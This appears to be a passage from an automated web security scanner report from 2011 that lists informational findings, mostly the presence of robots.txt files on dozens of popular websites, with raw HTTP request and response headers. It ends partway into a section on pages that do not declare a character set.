
The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wowhead.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:33:27 GMT
Vary: Accept-Encoding
Content-Length: 188
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /search
Disallow: /search/
Disallow: /random
Disallow: /random/
Disallow: /captcha
Disallow: /captcha/
Disallow: /profile=*
Sitemap: http://www.wowhead.com/sitemap
24.933. http://www.wowwiki.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wowwiki.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wowwiki.com

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
X-Pass-Cache-Control: max-age=86400
X-Cacheable: YES
Content-Length: 3199
Date: Sat, 02 Apr 2011 13:46:00 GMT
Connection: close
X-Served-By: varnish-s3-SJC, varnish-i7-IOWA
X-Cache: HIT, HIT
X-Cache-Hits: 6, 89
X-Timer: S1301751960.931620836,VS0,VE0
Vary: Accept-Encoding
Set-Cookie: Geo = {"city":"Dallas","country":"US","continent":"NA"}; path=/
X-Age: 79869
Cache-Control: max-age=86400

#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# irresponsible, your access to the site may be blocked.
#


...[SNIP]...
24.934. http://www.wsbtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wsbtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wsbtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 03 Feb 2010 00:10:22 GMT
ETag: "17e8577-176-b5b1780"
Accept-Ranges: bytes
Content-Length: 374
Content-Type: text/plain
Cache-Control: max-age=1819
Expires: Sat, 02 Apr 2011 14:20:53 GMT
Date: Sat, 02 Apr 2011 13:50:34 GMT
Connection: close
Set-Cookie: alpha=47ce8f18567b0000aa29974d0cfc0400822b0000; expires=Tue, 30-Mar-2021 13:50:34 GMT; path=/; domain=.wsbtv.com

User-agent: *
Disallow: /print/
Disallow: /404/
Disallow: /cf/
Disallow: /tu/
Disallow: /det/
Disallow: /sh/

User-agent: Googlebot
Disallow: /search/
Disallow: /print/
Disallow: /404/
Disallow: /cf/

...[SNIP]...
24.935. http://www.wunderground.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:13 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 02 Dec 2010 18:38:26 GMT
Accept-Ranges: bytes
Content-Length: 27683
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /AS5000/
Disallow: /history/
Disallow: /geo/
Disallow: /ndfdimagery/
Disallow: /weatherstation/
Disallow: /auto/927/weatherstation/
Disallow: /auto/1000tourtemplate/weatherstat
...[SNIP]...
24.936. http://www.wwe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wwe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wwe.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17
Last-Modified: Mon, 28 Mar 2011 21:31:42 GMT
ETag: "4948e14-7b-49f91ab6d8b80"
X-App: p5tyr3
Content-Type: text/plain; charset=utf-8
X-Varnish: 393133231 392989595
X-CacheTyr-Server: p5tyr3
X-CacheTyr: HIT
X-CacheTyr-Hits: 1
Content-Length: 123
X-Varnish: 1107614515 1107320412
X-CacheKyte-Server: p5kyte5
X-CacheKyte: HIT
X-CacheKyte-Hits: 5
Cache-Control: public, max-age=43598
Date: Sat, 02 Apr 2011 13:39:43 GMT
Connection: close

sitemap: http://www.wwe.com/sitemap.xml

User-agent: *
Allow: /
Disallow: /node/
Disallow: /admin/
Disallow: /teaser/
24.937. http://www.xanga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xanga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xanga.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:31 GMT
Connection: close
Content-Length: 257

# robots.txt file for www.xanga.com

User-agent: *
Disallow: /sitemessage.aspx
Disallow: /error.aspx
Disallow: /sorry.aspx
Disallow: /CaptchaImage.axd
Disallow: /randletters.aspx
Disallow: /xa
...[SNIP]...
24.938. http://www.xe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xe.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:24 GMT
Server: Apache
Set-Cookie: ID=173.193.214.243.1301752224555110; path=/; expires=Fri, 28-Mar-31 13:50:24 GMT
Last-Modified: Fri, 15 Jun 2007 18:48:52 GMT
ETag: "2d002d-29c-4c66ed00"
Accept-Ranges: bytes
Content-Length: 668
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# All crawlers keep out of 8 Day flash directory and flash tutorials
# Always list specific agents first, not last, as it could ignore it otherwise

User-agent: *
Disallow: /learn/8day/flash/
Disallow
...[SNIP]...
24.939. http://www.yakaz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yakaz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yakaz.com

Response

HTTP/1.1 200 OK
Connection: close
Server: Yakaz Web Server
Date: Sat, 02 Apr 2011 13:58:04 GMT
Content-Length: 411
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /results
Disallow: /view
Disallow: /mylist
Disallow: /rss
Disallow: /redirect
Disallow: /r/
Disallow: /s/

User-Agent: Mediapartners-Google
Allow: /results
Disallow: /view
Disa
...[SNIP]...
24.940. http://www.yallwire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yallwire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yallwire.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Wed, 21 Jan 2009 22:23:24 GMT
ETag: "232292-4fc-461059aa3cf00"
Accept-Ranges: bytes
Content-Length: 1276
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#For Google Adsense and Adwords Quality
User-agent: Mediapartners-Google
Disallow: /email/*
Disallow: /ms_asx/*
Disallow: /rmsmail/*
Disallow: /rate.php*
Disallow: /login.php*
Disallow: /titleb
...[SNIP]...
24.941. http://www.yardbarker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yardbarker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yardbarker.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Sat, 02 Apr 2011 13:37:46 GMT
Content-Type: text/plain
Content-Length: 141
Last-Modified: Mon, 04 Oct 2010 18:45:29 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
# old paths, don't follow
Disallow: /teams/*
Disallow: /players/*
Disallow: /users/*

Disallow: /forum/*

Disallow: /account/*
24.942. http://www.yellow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yellow.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:56 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.4
Last-Modified: Fri, 25 Feb 2011 22:17:05 GMT
ETag: "5a015a-1e2-49d22b0a69a40"
Accept-Ranges: bytes
Content-Length: 482
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /adbuys/
Disallow: /redir/
Disallow: /webresults.html
Disallow: /tollresults.html
Disallow: /contact/contact.html
Disallow: /best-match/
Disallow: /business-details/
Disallow:
...[SNIP]...
24.943. http://www.yellowbook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowbook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yellowbook.com

Response

HTTP/1.1 200 OK
Content-Length: 236
Content-Type: text/plain
Content-Location: http://www.yellowbook.com/robots.txt
Last-Modified: Fri, 01 Apr 2011 09:11:27 GMT
Accept-Ranges: bytes
ETag: "5419e5c74cf0cb1:2c1b"
Server: Microsoft-IIS/6.0
WSN: K31
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:58 GMT
Connection: close

...User-agent: *
Disallow: /resources
Disallow: /views
Disallow: /MyYellowbook
Disallow: /myyellowbook
Disallow: /MyYellowBook
Disallow: /clicktocall
Disallow: /link

Sitemap: http://www.yell
...[SNIP]...
24.944. http://www.yellowpages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yellowpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:07 GMT
Status: 200 OK
Connection: close
Server: nginx
Content-Type: text/plain; charset=utf-8
X-Runtime: 1
ETag: "3f10d7693e3c9a99e28bf376ddceced1"
Cache-Control: no-cache
Content-Length: 171
Set-Cookie: _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlYjdkYzU2YjU2YzA5ODBhMWJlNWZiMWM3YWI3OWRhM2U%3D--ff8ac05f5d3eaccfd834536905a3770481723234; path=/; HttpOnly
Set-Cookie: b=10013; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
X-Urid: d-aeffe5e0-3f54-012e-71a6-00237da0d626
Expires: Sat, 02 Apr 2011 12:43:06 GMT

User-Agent: *
Disallow: /relevance_feedback
Disallow: /images/li.gif
Disallow: /images/logging_requests.gif
User-Agent: 008
Disallow: /
User-Agent: slurp
Crawl-delay: .25
24.945. http://www.yelp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yelp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yelp.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:48 GMT
Server: Apache
X-Node: web2, www_all
Accept-Ranges: bytes
Content-Length: 1295
Cache-Control: max-age=7776000
Expires: Fri, 01 Jul 2011 12:43:48 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Mode: ro
X-Proxied: lb2

#
# 1. A robot may not injure a human being or, through inaction, allow a
# human being to come to harm.
#
# 2. A robot must obey orders given it by human beings except where such
# orders would confl
...[SNIP]...
24.946. http://www.yidio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yidio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yidio.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:13 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 27 Jan 2011 22:50:44 GMT
ETag: "31b36d3-1cf-49adbc7983900"
Accept-Ranges: bytes
Content-Length: 463
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *

Disallow: /signup.php
Disallow: /login.php
Disallow: /search.php
Disallow: /search_advanced.php
Disallow: /search/
Disallow: /search_new.php
Disallow: /id/
Disallow: /tag/
Noindex: /sig
...[SNIP]...
24.947. http://www.younghollywood.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.younghollywood.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.younghollywood.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 24 Feb 2011 00:49:15 GMT
ETag: "7413b3-39d-49cfc952898c0"
Cache-Control: max-age=259200
Expires: Tue, 05 Apr 2011 07:49:55 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 925
X-Varnish-IP: 192.168.100.137
Date: Sat, 02 Apr 2011 13:42:08 GMT
X-Varnish: 1914680324 1913844177
Age: 21133
Via: 1.1 varnish
Connection: close

User-agent: *
Crawl-delay: 10
Disallow: /other-links/podcast/
Disallow: /podcast.html
Disallow: /libraries/
Disallow: /podcast1/
Disallow: /yh-news/
Disallow: /modules/
Disallow: /news/2007/

...[SNIP]...
24.948. http://www.yourdictionary.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourdictionary.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yourdictionary.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:38 GMT
Server: Apache
Last-Modified: Wed, 02 Mar 2011 01:06:15 GMT
ETag: "1cd-49d758500cfc0"
Accept-Ranges: bytes
Content-Length: 461
Cache-Control: max-age=5184000
Expires: Wed, 01 Jun 2011 13:57:38 GMT
Vary: Accept-Encoding,User-Agent
X-LTK-Server: yd-ec2-www
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /business_profile/
Disallow: /ahd/test/
Disallow: /store/
Disallow: /includes/
Disallow: /css/
Disallow: /js/
Disallow: /member/
Disallow: /community/
Disallow: /membe
...[SNIP]...
24.949. http://www.yourfilehost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourfilehost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yourfilehost.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:04:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 14 May 2008 06:29:11 GMT
ETag: "3e781bc-35-e615dbc0"
Accept-Ranges: bytes
Content-Length: 53
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /hosting/
Disallow: /bbt/
24.950. http://www.yuku.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yuku.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yuku.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:36:39 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Tue, 07 Dec 2010 14:21:19 GMT
ETag: "810cab-48-496d2b7df35c0"
Accept-Ranges: bytes
Content-Length: 72
Cache-Control: max-age=7776000
Expires: Fri, 01 Jul 2011 13:36:39 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"

User-agent: MJ12bot
Disallow: /
User-agent:    *
Crawl-delay: 10
Disallow:
24.951. http://www.zabasearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zabasearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zabasearch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 13 Oct 2008 23:25:58 GMT
ETag: "80680-2d9-d243cd80"
Accept-Ranges: bytes
Content-Length: 729
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.zabasearch.com/

User-agent: *
# files at root
Disallow: /query1_zaba.php
Disallow: /query1_yahoo.php
Disallow: /query1_anywho.php
Disallow: /query1_referral.php
Disallow:
...[SNIP]...
24.952. http://www.zap2it.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zap2it.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zap2it.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 123
Content-Type: text/plain
Last-Modified: Wed, 30 Jul 2008 02:03:51 GMT
ETag: "7b-488fcc07"
Cache-Control: private, max-age=49
Date: Sat, 02 Apr 2011 13:37:21 GMT
Content-Length: 123
Connection: close

User-agent: *
Disallow: /stylesheets
Disallow: /javascript
Disallow: /event.ng/
Sitemap: http://www.zap2it.com/sitemap.xml
24.953. http://www.zappos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zappos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zappos.com

Response

HTTP/1.0 200 OK
Server: nginx/0.9.4
Content-Type: text/plain
Cteonnt-Length: 759
Last-Modified: Wed, 02 Feb 2011 03:43:44 GMT
X-Core-Value: 1. Deliver WOW Through Service
X-Recruiting: If you're reading this, maybe you should be working at Zappos instead. Check out jobs.zappos.com
Cache-Control: private, max-age=0
Date: Sat, 02 Apr 2011 13:31:02 GMT
Content-Length: 759
Connection: close

User-agent: *
Disallow: /r/
Disallow: /bin/
Disallow: /n/howtophone.cgi
Disallow: /n/multi_view.cgi
Disallow: /n/redirect.cgi
Disallow: /noauth/redirect.cgi
Disallow: /n/sc
Disallow: /multiview
Disall
...[SNIP]...
24.954. http://www.zazzle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zazzle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zazzle.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: text/plain
Last-Modified: Mon, 08 Nov 2010 08:27:51 GMT
Accept-Ranges: bytes
ETag: "6c050d51e7fcb1:0"
Server: Microsoft-IIS/7.5
Date: Sat, 02 Apr 2011 13:35:15 GMT
Connection: keep-alive
Content-Length: 624

User-agent: *
Disallow: /.components/
Disallow: /.controls/
Disallow: /.emails/
Disallow: /.masterpages/
Disallow: /.templates/
Disallow: /_internal/
Disallow: /_scripts/
Disallow: /_tests/
D
...[SNIP]...
24.955. http://www.zillow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zillow.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:35 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 13:36:35 GMT
ETag: W/"771-1277524721000"
Last-Modified: Sat, 26 Jun 2010 03:58:41 GMT
Content-Type: text/plain
Content-Length: 771
Set-Cookie: BIGipServertomcat_pool_0=3456895498.0.0000; path=/
Via: 1.0 www.zillow.com
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=2, max=14
Connection: close
Set-Cookie: BIGipServerapache_pool_0=2534148618.0.0000; path=/

# Access to and use of Zillow.com is governed by our Terms of Use. See http://www.zillow.com/corp/Terms.htm

User-agent: *
Disallow: /claiming/
Disallow: /contact/
Disallow: /corp/Terms.htm
Disallow:
...[SNIP]...
24.956. http://www.zimbio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zimbio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zimbio.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sat, 02 Apr 2011 13:24:00 GMT
Content-Type: text/plain
Connection: close
Expires: Sat, 02 Apr 2011 13:34:00 GMT
Vary: Cookie
Last-Modified: Sat, 02 Apr 2011 13:16:15 GMT
Cache-Control: max-age=600

User-agent: *
Disallow: /member/sushil345/
Disallow: /*/polls/random$
Disallow: /search?
Disallow: /*/news/
Disallow: /*/news?
Disallow: /*/news$
Disallow: /*/history/
Disallow: /*/history?
Disallow:
...[SNIP]...
24.957. http://www.ziprealty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ziprealty.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ziprealty.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Mar 2011 05:05:14 GMT
ntCoent-Length: 893
Content-Type: text/plain
Cache-Control: private, max-age=86400
Date: Sat, 02 Apr 2011 13:53:11 GMT
Content-Length: 893
Connection: close

User-agent: *

Disallow: /registration/
Disallow: /account/
Disallow: /login/
Disallow: /images/
Disallow: /images_personnel/
Disallow: /images_mls/
Disallow: /js/
Disallow: /admin/
Disallow: /css/
Di
...[SNIP]...
24.958. http://www.zmags.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zmags.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zmags.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Mar 2011 13:15:31 GMT
ETag: "4000134-663-49f3a4592a2c0"
Accept-Ranges: bytes
Content-Length: 1635
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=6977
Expires: Sat, 02 Apr 2011 15:59:42 GMT
Date: Sat, 02 Apr 2011 14:03:25 GMT
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.959. http://www.zoosk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zoosk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zoosk.com

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:40:04 GMT
Keep-Alive: timeout=10, max=997
Accept-Ranges: bytes
ETag: "207823b-4c2-49fe071f1b800"
Connection: close
Last-Modified: Fri, 01 Apr 2011 19:30:40 GMT
Content-Length: 1218

#
# Well I've got news for you. You are mine now! You belong to me!
#

User-Agent: *
Disallow: /logout.php*
Disallow: /ajax/
Disallow: /blocked.php
Disallow: /blocked.php*
Disallow: /signup.php*
Disal
...[SNIP]...
24.960. http://www.zshare.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zshare.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zshare.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
ETag: "1076618988"
Accept-Ranges: bytes
Last-Modified: Thu, 05 Aug 2010 08:04:49 GMT
Content-Length: 166
Connection: close
Date: Sat, 02 Apr 2011 14:00:58 GMT
Server: lighttpd/1.5.0

User-Agent: *
Disallow: /download/
Disallow: /abuse.html
Disallow: /delete.html

User-Agent: MediaPartners-Google
Allow: /

User-agent: Browsershots
Allow: /
24.961. http://www.zvents.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zvents.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 02 Apr 2011 13:43:44 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-Runtime: 5
ETag: "43a325d9ba9f2deac2638cedc6222807"
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 546
Set-Cookie: _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlZmUxMDk1OGNlYjdjZDA2NjU2NTc0MzFmYTZlMzFkNDA%3D--4eaf7ac3d6bc616a4d456b7e159c86b1cc89bb8e; path=/; expires=Sat, 02-Jul-2011 13:43:44 GMT; HttpOnly

User-agent: *
Disallow: /javascripts
Disallow: /rss
Disallow: /rss*
Disallow: /ical
Disallow: /ical*
Disallow: /json
Disallow: /json*
Disallow: /partners
Disallow: /partners*
Disallow: /user/
Disallow
...[SNIP]...
24.962. http://www.zynga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zynga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zynga.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 17 Sep 2010 16:52:50 GMT
ETag: "18192b7-24-4907764977c80"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: ia_archiver
Disallow: /
25. HTML does not specify charset  previous  next
There are 44 instances of this issue:

25.1. https://activresa-secure2.icor.fr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://activresa-secure2.icor.fr
Path:   /

Request

GET / HTTP/1.1
Host: activresa-secure2.icor.fr
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Content-Length: 261
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:48:16 GMT

<html><head><title>Error</title></head><body><head><title>Affichage du contenu du r.pertoire refus.</title></head>
<body><h1>Affichage du contenu du r.pertoire refus.</h1>L'affichage du contenu n'est
...[SNIP]...
25.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

